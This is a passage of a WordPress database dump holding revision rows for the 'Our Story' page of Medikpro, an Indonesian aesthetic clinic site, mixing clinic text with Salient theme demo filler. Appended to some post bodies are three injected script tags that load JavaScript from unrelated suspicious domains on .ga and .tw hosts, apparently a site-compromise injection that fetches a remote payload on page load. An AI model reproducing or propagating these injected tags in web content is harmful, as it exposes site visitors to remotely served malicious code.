border_radius=\"none\"][/vc_column_inner][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" column_border_width=\"none\" column_border_style=\"solid\"][vc_custom_heading text=\"Komitmen kami\" font_container=\"tag:h5|text_align:left|color:rgba(255%2C255%2C255%2C0.74)\" use_theme_fonts=\"yes\" css_animation=\"fadeInUp\"][split_line_heading]</p>\n<h2>Visi dan Misi</h2>\n<p>[/split_line_heading][vc_custom_heading text=\"Visi</p>\n<p>Menjadi klinik aesthetic terkemuka di Indonesia untuk memberikan pengalaman terbaik dalam menangani berbagai permasalahan kulit.</p>\n<p>Misi</p>\n<p>Memberikan layanan perawatan kulit dan tubuh yang didukung dengan teknologi dan inovasi terkini.<br />\nMemberikan solusi treatment yang tepat dan aman.<br />\nMemberikan pelayanan yang berkualitas, terjamin dan selalu mengutamakan kebutuhan customer.<br />\nMemberikan hasil yang memuaskan dan terpercaya.\" font_container=\"tag:p|text_align:left|color:rgba(255%2C255%2C255%2C0.7)\" use_theme_fonts=\"yes\" css_animation=\"fadeInUp\" css=\".vc_custom_1513223527064{padding-right: 10% !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"5%\" bottom_padding=\"5%\" id=\"philosophy\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][split_line_heading]</p>\n<h2 style=\"color: #1e83ec;\">Our Philosophy</h2>\n<p>[/split_line_heading][vc_row_inner column_margin=\"default\" top_padding=\"15\" bottom_padding=\"25\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]Filosofi dari Medikpro berasal dari kata Medik yang berarti berhubungan dengan pengobatan dan juga pro adalah singkatan dari professional dalam arti mengobati secara professional. Pada bagian atas tulisan Pro, di sebelah kanan terdapat logo daun berwarna biru yang memiliki arti bahwa warna biru merupakan warna tenang dan bersifat professional. Dengan latar belakang yang berwarna putih memberikan kesan steril, bersih dan juga segar.</p>\n<p>Dalam hal ini Medikpro memiliki konsep warna yaitu biru dan juga putih yang didukung dengan ruangan yang sebagian besar berwarna putih serta kemasan produk yang digunakan berwarna biru yang melambangkan kesegaran.[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_gallery type=\"image_grid\" layout=\"fullwidth\" item_spacing=\"default\" constrain_max_cols=\"true\" gallery_style=\"3\" load_in_animation=\"none\" img_size=\"500x500\"][/vc_column][/vc_row]</p>\n<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Our Story','','inherit','closed','closed','','19-autosave-v1','','','2018-01-18 00:21:20','2018-01-18 00:21:20','',19,'http://sandbox.futuremediatrix.com/medikpro/2017/12/10/19-autosave-v1/',0,'revision','',0),(6204,1,'2017-12-10 16:23:11','2017-12-10 16:23:11','[vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][page_submenu alignment=\"center\" sticky=\"true\" bg_color=\"#111111\" link_color=\"#ffffff\"][page_link link_url=\"#why\" title=\"Why Medikpro\" tab_id=\"1451708274600-9\" id=\"1451966795422-6\"] [/page_link][page_link link_url=\"#vismis\" title=\"Vision and Mission\" tab_id=\"1451708274600-9\" id=\"1451966795475-6\"] [/page_link][page_link link_url=\"#philosophy\" title=\"Philosophy\" tab_id=\"1451708274756-7\" id=\"1451966795453-10\"] [/page_link][/page_submenu][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_image=\"6502\" bg_position=\"center top\" bg_repeat=\"no-repeat\" bg_color=\"#cbcbc3\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"4%\" bottom_padding=\"4%\" id=\"why\" enable_gradient=\"true\" color_overlay_2=\"#151519\" gradient_direction=\"top_to_bottom\" overlay_strength=\"1\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" top_padding=\"65%\" text_align=\"left\"][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column_inner][/vc_row_inner][split_line_heading]\r\n<h2>Why Medikpro</h2>\r\n[/split_line_heading][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]Setiap orang pasti mempunyai 2 sampai 3 masalah kulit terutama pada bagian wajah. Setitik kerutan atau noda di wajah tentu akan merusak penampilan, sedangkan penampilan menjadi salah satu hal terpenting dalam kehidupan. Beragam cara dilakukan untuk mengembalikkan kecerahan kulit dan wajah seperti mengunjungi klinik kecantikan. Pasalnya, Memilih klinik kecantikan yang dapat memahami kebutuhan kulit masing-masing orang tidaklah mudah. Dan lagi, mayoritas para wanita khawatir setelah melakukan perawatan akan menyebabkan ketergantungan.\r\n\r\nDemi menjawab dan memberikan solusi untuk setiap permasalahan kulit dan wajah yang Anda alami, kini hadir Medikpro sebagai klinik Aesthetic yang peka akan kebutuhan setiap Individu.\r\n\r\nApa yang spesial dari Medikpro?\r\n<ul>\r\n 	<li>Medikpro mendukung setiap perawatan dengan teknologi canggih dan terkini</li>\r\n 	<li>Penerapan konsep dermatologi modern yang dijamin aman untuk kulit</li>\r\n 	<li>Mempunyai banyak solusi dan pilihan bagi setiap permasalahan kulit</li>\r\n 	<li>Memberikan perawatan yang efektif, berkualitas, terjamin dan selalu mengutamakan customer</li>\r\n 	<li>Memberikan hasil yang sesuai dengan ekspektasi customer kami</li>\r\n</ul>\r\nMedikpro bisa menjadi pilihan yang tepat bagi Anda dan setiap kebutuhan Anda, karena kepuasan Anda menjadi motivasi bagi kami untuk membawa perubahan bagi diri Anda menjadi lebih baik lagi.[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#151519\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"7%\" id=\"vismis\" enable_gradient=\"true\" color_overlay=\"#232323\" color_overlay_2=\"#191919\" gradient_direction=\"left_t_to_right_b\" overlay_strength=\"1\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column enable_animation=\"true\" animation=\"reveal-from-bottom\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][fancy_box box_style=\"default\" icon_family=\"none\" image_url=\"6083\" color=\"Accent-Color\" link_url=\"http://themenectar.com/demo/salient-corporate/portfolio/blog-ui/\" link_text=\"View Case Study\" min_height=\"400\"]\r\n<h3>UI Design</h3>\r\nLorem ipsum dolor sit amet, consectetur adipiscing elit. In et arcu vel risus ullamcorper aliquet.[/fancy_box][/vc_column][vc_column enable_animation=\"true\" animation=\"reveal-from-bottom\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"200\"][fancy_box box_style=\"default\" icon_family=\"none\" image_url=\"6082\" color=\"Extra-Color-1\" link_url=\"http://themenectar.com/demo/salient-corporate/portfolio/night-sky-app/\" link_text=\"View Case Study\" min_height=\"400\"]\r\n<h3>Web Design</h3>\r\nLorem ipsum dolor sit amet, consectetur adipiscing elit. In et arcu vel risus ullamcorper aliquet.[/fancy_box][/vc_column][vc_column enable_animation=\"true\" animation=\"reveal-from-bottom\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"400\"][fancy_box box_style=\"default\" icon_family=\"none\" image_url=\"6052\" color=\"Extra-Color-2\" link_url=\"http://themenectar.com/demo/salient-corporate/portfolio/waveform/\" link_text=\"View Case Study\" min_height=\"400\"]\r\n<h3>Mountain Design</h3>\r\nLorem ipsum dolor sit amet, consectetur adipiscing elit. In et arcu vel risus ullamcorper aliquet.[/fancy_box][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"5%\" bottom_padding=\"5%\" id=\"philosophy\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][split_line_heading]\r\n<h2 style=\"color: #1e83ec;\"><span style=\"color: #1e83ec;\">Design is the paradise</span></h2>\r\n<h2 style=\"color: #1e83ec;\"><span style=\"color: #1e83ec;\">of individuality, eccentricity,</span></h2>\r\n<h2 style=\"color: #1e83ec;\"><span style=\"color: #1e83ec;\">abnormality, and humors.</span></h2>\r\n[/split_line_heading][vc_row_inner column_margin=\"default\" top_padding=\"15\" bottom_padding=\"25\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]We\'re Salient, a creative agency located in the heart of New York city. We pride ourselves on developing unique and professional solutions with a wide variety of mediums. Take a look around and don\'t be shy.[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h6 style=\"color: #1e83ec;\">What we can help you achieve</h6>\r\n<span style=\"color: rgba(0,0,0,0.45);\">Personal or corporate branding | SEO optimization | Web &amp; UI Design | Standing out in the crowd</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/4\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1452014618584{margin-bottom: 18px !important;}\"]\r\n<h5>Target Audience</h5>\r\n[/vc_column_text][fancy-ul icon_type=\"standard_dash\" color=\"Extra-Color-3\" alignment=\"left\" enable_animation=\"true\"]\r\n<ul>\r\n 	<li><span style=\"color: #999999;\">Medium Businesses</span></li>\r\n 	<li><span style=\"color: #999999;\">Freelance Designers</span></li>\r\n 	<li><span style=\"color: #999999;\">College Students</span></li>\r\n 	<li><span style=\"color: #999999;\">Sorta Athletes</span></li>\r\n 	<li><span style=\"color: #999999;\">Dairy Farmers</span></li>\r\n</ul>\r\n[/fancy-ul][divider line_type=\"No Line\" custom_height=\"20\"][vc_column_text css=\".vc_custom_1452014599720{margin-bottom: 18px !important;}\"]\r\n<h5>Our Specialties</h5>\r\n[/vc_column_text][fancy-ul icon_type=\"standard_dash\" color=\"Extra-Color-3\" alignment=\"left\" enable_animation=\"true\"]\r\n<ul>\r\n 	<li><span style=\"color: #999999;\">Program Management</span></li>\r\n 	<li><span style=\"color: #999999;\">Graphic &amp; UI Design</span></li>\r\n 	<li><span style=\"color: #999999;\">Customer Support</span></li>\r\n 	<li><span style=\"color: #999999;\">Video Editing</span></li>\r\n 	<li><span style=\"color: #999999;\">Sound Design</span></li>\r\n</ul>\r\n[/fancy-ul][/vc_column][vc_column column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/4\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1452014465975{margin-bottom: 18px !important;}\"]\r\n<h5>Notable Awards</h5>\r\n[/vc_column_text][fancy-ul icon_type=\"standard_dash\" color=\"Extra-Color-3\" alignment=\"left\" enable_animation=\"true\"]\r\n<ul>\r\n 	<li><span style=\"color: #999999;\">Top Customer Support</span></li>\r\n 	<li><span style=\"color: #999999;\">Most Liked Company</span></li>\r\n 	<li><span style=\"color: #999999;\">Best In Class 2016</span></li>\r\n 	<li><span style=\"color: #999999;\">Friendliest Group</span></li>\r\n 	<li><span style=\"color: #999999;\">Innovative Brand</span></li>\r\n</ul>\r\n[/fancy-ul][divider line_type=\"No Line\" custom_height=\"20\"][vc_column_text css=\".vc_custom_1452014481555{margin-bottom: 18px !important;}\"]\r\n<h5>Featured On</h5>\r\n[/vc_column_text][fancy-ul icon_type=\"standard_dash\" color=\"Extra-Color-3\" alignment=\"left\" enable_animation=\"true\"]\r\n<ul>\r\n 	<li><span style=\"color: #999999;\">ThemeNectar Show</span></li>\r\n 	<li><span style=\"color: #999999;\">Mr. Nectar\'s Blog</span></li>\r\n 	<li><span style=\"color: #999999;\">Top WP Themes</span></li>\r\n 	<li><span style=\"color: #999999;\">ThemeForest</span></li>\r\n 	<li><span style=\"color: #999999;\">Salient</span></li>\r\n</ul>\r\n[/fancy-ul][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_image=\"6507\" bg_position=\"center bottom\" bg_repeat=\"no-repeat\" parallax_bg=\"true\" parallax_bg_speed=\"fast\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"13%\" bottom_padding=\"13%\" id=\"culture\" enable_gradient=\"true\" color_overlay=\"#585b64\" color_overlay_2=\"#2c2f38\" gradient_direction=\"left_t_to_right_b\" overlay_strength=\"0.8\" shape_divider_position=\"bottom\"][vc_column centered_text=\"true\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][nectar_video_lightbox link_style=\"play_button\" video_url=\"https://www.youtube.com/watch?v=6oTurM7gESE\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_gallery type=\"image_grid\" layout=\"fullwidth\" item_spacing=\"default\" constrain_max_cols=\"true\" gallery_style=\"3\" load_in_animation=\"none\" img_size=\"500x500\"][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Our Story','','inherit','closed','closed','','19-revision-v1','','','2017-12-10 16:23:11','2017-12-10 16:23:11','',19,'http://sandbox.futuremediatrix.com/medikpro/2017/12/10/19-revision-v1/',0,'revision','',0),(6205,1,'2017-12-10 16:25:18','2017-12-10 16:25:18','[vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][page_submenu alignment=\"center\" sticky=\"true\" bg_color=\"#111111\" link_color=\"#ffffff\"][page_link link_url=\"#why\" title=\"Why Medikpro\" tab_id=\"1451708274600-9\" id=\"1451966795422-6\"] [/page_link][page_link link_url=\"#vismis\" title=\"Vision and Mission\" tab_id=\"1451708274600-9\" id=\"1451966795475-6\"] [/page_link][page_link link_url=\"#philosophy\" title=\"Philosophy\" tab_id=\"1451708274756-7\" id=\"1451966795453-10\"] [/page_link][/page_submenu][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_image=\"6502\" bg_position=\"center top\" bg_repeat=\"no-repeat\" bg_color=\"#cbcbc3\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"4%\" bottom_padding=\"4%\" id=\"why\" enable_gradient=\"true\" color_overlay_2=\"#151519\" gradient_direction=\"top_to_bottom\" overlay_strength=\"1\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" top_padding=\"65%\" text_align=\"left\"][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column_inner][/vc_row_inner][split_line_heading]\r\n<h2>Why Medikpro</h2>\r\n[/split_line_heading][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]Setiap orang pasti mempunyai 2 sampai 3 masalah kulit terutama pada bagian wajah. Setitik kerutan atau noda di wajah tentu akan merusak penampilan, sedangkan penampilan menjadi salah satu hal terpenting dalam kehidupan. Beragam cara dilakukan untuk mengembalikkan kecerahan kulit dan wajah seperti mengunjungi klinik kecantikan. Pasalnya, Memilih klinik kecantikan yang dapat memahami kebutuhan kulit masing-masing orang tidaklah mudah. Dan lagi, mayoritas para wanita khawatir setelah melakukan perawatan akan menyebabkan ketergantungan.\r\n\r\nDemi menjawab dan memberikan solusi untuk setiap permasalahan kulit dan wajah yang Anda alami, kini hadir Medikpro sebagai klinik Aesthetic yang peka akan kebutuhan setiap Individu.\r\n\r\nApa yang spesial dari Medikpro?\r\n<ul>\r\n 	<li>Medikpro mendukung setiap perawatan dengan teknologi canggih dan terkini</li>\r\n 	<li>Penerapan konsep dermatologi modern yang dijamin aman untuk kulit</li>\r\n 	<li>Mempunyai banyak solusi dan pilihan bagi setiap permasalahan kulit</li>\r\n 	<li>Memberikan perawatan yang efektif, berkualitas, terjamin dan selalu mengutamakan customer</li>\r\n 	<li>Memberikan hasil yang sesuai dengan ekspektasi customer kami</li>\r\n</ul>\r\nMedikpro bisa menjadi pilihan yang tepat bagi Anda dan setiap kebutuhan Anda, karena kepuasan Anda menjadi motivasi bagi kami untuk membawa perubahan bagi diri Anda menjadi lebih baik lagi.[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_image=\"https://source.unsplash.com/nvzvOPQW0gc\" bg_position=\"left top\" bg_repeat=\"no-repeat\" parallax_bg=\"true\" parallax_bg_speed=\"fast\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"10%\" bottom_padding=\"10%\" id=\"vismis\" color_overlay=\"rgba(10,10,10,0.67)\" overlay_strength=\"0.5\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner equal_height=\"yes\" content_placement=\"middle\" column_margin=\"default\" text_align=\"left\"][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" column_border_width=\"none\" column_border_style=\"solid\"][nectar_cascading_images image_1_bg_color=\"#3452ff\" image_1_offset_x_sign=\"+\" image_1_offset_x=\"0%\" image_1_offset_y_sign=\"+\" image_1_offset_y=\"0%\" image_1_rotate_sign=\"+\" image_1_rotate=\"none\" image_1_animation=\"Grow In\" image_1_box_shadow=\"none\" image_2_url=\"https://source.unsplash.com/iCtJF-A5hvs/600x400\" image_2_offset_x_sign=\"-\" image_2_offset_x=\"25%\" image_2_offset_y_sign=\"+\" image_2_offset_y=\"30%\" image_2_rotate_sign=\"+\" image_2_rotate=\"none\" image_2_animation=\"Grow In\" image_2_box_shadow=\"none\" image_3_url=\"https://source.unsplash.com/nvzvOPQW0gc/600x400\" image_3_offset_x_sign=\"+\" image_3_offset_x=\"15%\" image_3_offset_y_sign=\"-\" image_3_offset_y=\"30%\" image_3_rotate_sign=\"+\" image_3_rotate=\"none\" image_3_animation=\"Grow In\" image_3_box_shadow=\"x_large_depth\" image_4_offset_x_sign=\"+\" image_4_offset_x=\"0%\" image_4_offset_y_sign=\"+\" image_4_offset_y=\"0%\" image_4_rotate_sign=\"+\" image_4_rotate=\"none\" image_4_animation=\"Fade In\" image_4_box_shadow=\"none\" border_radius=\"none\"][/vc_column_inner][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" column_border_width=\"none\" column_border_style=\"solid\"][vc_custom_heading text=\"Way back when\" font_container=\"tag:h5|text_align:left|color:rgba(255%2C255%2C255%2C0.74)\" use_theme_fonts=\"yes\" css_animation=\"fadeInUp\"][split_line_heading]\r\n<h2>We decided to move</h2>\r\n<h2>forward with building</h2>\r\n[/split_line_heading][vc_custom_heading text=\"Far far away, behind the word mountains, far from the countries Vokalia and Consonantia, there live the blind texts. Separated they live in Bookmarksgrove right at the coast of the Semantics, a large language ocean.\" font_container=\"tag:p|text_align:left|color:rgba(255%2C255%2C255%2C0.7)\" use_theme_fonts=\"yes\" css_animation=\"fadeInUp\" css=\".vc_custom_1486564699536{padding-right: 10% !important;}\"][nectar_btn size=\"large\" button_style=\"see-through-2\" hover_text_color_override=\"#ffffff\" icon_family=\"none\" url=\"#\" text=\"Show Me How\" margin_top=\"25\" css_animation=\"fadeInUp\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"5%\" bottom_padding=\"5%\" id=\"philosophy\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][split_line_heading]\r\n<h2 style=\"color: #1e83ec;\"><span style=\"color: #1e83ec;\">Design is the paradise</span></h2>\r\n<h2 style=\"color: #1e83ec;\"><span style=\"color: #1e83ec;\">of individuality, eccentricity,</span></h2>\r\n<h2 style=\"color: #1e83ec;\"><span style=\"color: #1e83ec;\">abnormality, and humors.</span></h2>\r\n[/split_line_heading][vc_row_inner column_margin=\"default\" top_padding=\"15\" bottom_padding=\"25\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]We\'re Salient, a creative agency located in the heart of New York city. We pride ourselves on developing unique and professional solutions with a wide variety of mediums. Take a look around and don\'t be shy.[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h6 style=\"color: #1e83ec;\">What we can help you achieve</h6>\r\n<span style=\"color: rgba(0,0,0,0.45);\">Personal or corporate branding | SEO optimization | Web &amp; UI Design | Standing out in the crowd</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/4\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1452014618584{margin-bottom: 18px !important;}\"]\r\n<h5>Target Audience</h5>\r\n[/vc_column_text][fancy-ul icon_type=\"standard_dash\" color=\"Extra-Color-3\" alignment=\"left\" enable_animation=\"true\"]\r\n<ul>\r\n 	<li><span style=\"color: #999999;\">Medium Businesses</span></li>\r\n 	<li><span style=\"color: #999999;\">Freelance Designers</span></li>\r\n 	<li><span style=\"color: 